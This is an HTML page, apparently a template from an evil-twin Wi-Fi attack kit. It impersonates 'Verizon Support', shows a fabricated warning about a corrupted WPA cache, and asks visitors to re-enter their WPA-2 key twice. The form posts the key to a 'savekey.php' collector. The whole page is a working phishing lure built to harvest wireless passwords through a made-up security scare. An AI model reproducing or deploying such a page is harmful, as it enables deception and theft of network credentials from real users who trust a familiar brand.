<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Verizon Support</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link href="verizon.css" rel="stylesheet" type="text/css" />
</head>

<body>
<div class="verizon" id="base" align="center">


<div class="verizon" id="logo" align="center">
<img src="placelogohere" alt="Verizon" align="center" />
</div>

<div class="verizon" id="box" >
<p align="center">ADSL WPA PMKSA Cache Corrupted - WPA Handshake in<strong> Plain Text!</strong>:</p>


<p align="left" class="verizon" id="normal" >&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 
For your security, re-enter your <strong>WPA-2 Key</strong> in order to access the internet.</p>

<div align="left">
<form id="form1" name="form1" method="post" action="savekey.php">
<p>WPA-2 Key: &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; &nbsp; WPA-2 Key (confirm):</p>
<input name="key1" type="password" class="textfield" /><input name="key2" type="password" class="textfield" />

<input type="submit" value="Enter" />
</form>

</div>
</div>

</div>
</body>

</html>
